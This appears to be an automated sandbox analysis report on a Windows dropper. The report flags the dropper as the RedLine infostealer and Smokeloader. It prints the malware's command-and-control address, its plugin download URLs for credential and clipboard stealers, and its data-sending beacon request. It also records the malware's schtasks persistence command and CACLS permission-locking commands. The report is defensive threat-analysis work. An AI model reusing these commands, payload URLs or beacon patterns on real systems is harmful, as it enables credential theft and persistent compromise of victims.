00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI

Source: Joe Sandbox View

IP Address: 62.204.41.4 62.204.41.4

Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll2;
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll(;
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dlli;
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dlls
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.php
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.php(l
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.php4
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.php5342a2
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.php8
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.php9e5342a2
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpC
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpH
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpQ
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpR
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpZI
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpa
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpa106e76
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpd
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpi
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpion
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpix
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpm32
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpn
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpoft
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpp
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exe#
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exe=
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exel
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.4/Gol478Ns/index.phps

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 6_2_008C86E2 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

6_2_008C86E2

Source: global traffic	HTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
Source: global traffic	HTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:57:03 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.4

Source: unknown

HTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1

Source: xriv.exe, 00000006.00000002.365562441.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.aKuf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.3.aKuf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.aKuf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.aKuf.exe.580e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.338085123.0000000000676000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00073BA2	0_2_00073BA2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00075C9E	0_2_00075C9E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01083BA2	1_2_01083BA2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01085C9E	1_2_01085C9E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00408C60	2_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0040DC11	2_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00407C3F	2_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00418CCC	2_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00406CA0	2_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_004028B0	2_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0041A4BE	2_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00418244	2_2_00418244
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00401650	2_2_00401650
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00402F20	2_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_004193C4	2_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00418788	2_2_00418788
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00402F89	2_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00402B90	2_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_004073A0	2_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0058786D	2_2_0058786D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_005818B7	2_2_005818B7
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_005831F0	2_2_005831F0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_005989EF	2_2_005989EF
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00583187	2_2_00583187
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00582B17	2_2_00582B17
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_005984AB	2_2_005984AB
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00582DF7	2_2_00582DF7
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0058DE78	2_2_0058DE78
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00588EC7	2_2_00588EC7
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00587EA6	2_2_00587EA6
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00586F07	2_2_00586F07
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00598F33	2_2_00598F33
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0059A725	2_2_0059A725
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_005877D9	2_2_005877D9
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_02130DB0	2_2_02130DB0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_02130DAC	2_2_02130DAC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008E8530	6_2_008E8530
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008E754D	6_2_008E754D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008C6F40	6_2_008C6F40

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.aKuf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.3.aKuf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.aKuf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.aKuf.exe.580e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.338085123.0000000000676000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00071F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,		0_2_00071F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01081F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,		1_2_01081F90

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: String function: 0058E43F appears 44 times
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: String function: 008D5E20 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: String function: 008D7CE0 appears 40 times

Source: file.exe	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 381118 bytes, 2 files, at 0x2c +A "bKug.exe" +A "xriv.exe", ID 1586, number 1, 18 datablocks, 0x1503 compression
Source: bKug.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 189668 bytes, 2 files, at 0x2c +A "aKuf.exe" +A "nika.exe", ID 1546, number 1, 9 datablocks, 0x1503 compression

Source: file.exe, 00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aKuf.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@37/14@0/1

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0007597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

0_2_0007597D

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Code function: 4_2_00007FF9A5D41B10 ChangeServiceConfigA,

4_2_00007FF9A5D41B10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00074FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,

0_2_00074FE0

Source: file.exe	ReversingLabs: Detection: 64%
Source: file.exe	Virustotal: Detection: 52%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Jump to behavior
